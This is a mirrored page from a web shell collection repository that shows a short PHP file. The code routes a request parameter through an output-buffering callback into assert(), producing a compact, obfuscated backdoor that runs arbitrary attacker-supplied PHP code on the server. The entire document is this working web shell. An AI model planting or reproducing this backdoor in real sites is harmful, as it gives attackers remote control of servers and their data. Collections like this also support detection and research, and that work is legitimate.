mirror of
https://github.com/tennc/webshell
synced 2024-11-13 23:17:10 +00:00
8 lines
144 B
PHP
8 lines
144 B
PHP
|
<?php
|
||
|
$evalstr="";
|
||
|
ob_start(function ($c,$d){global $evalstr;$evalstr=$c;});
|
||
|
echo $_REQUEST['pass'];
|
||
|
ob_end_flush();
|
||
|
assert($evalstr);
|
||
|
?>
|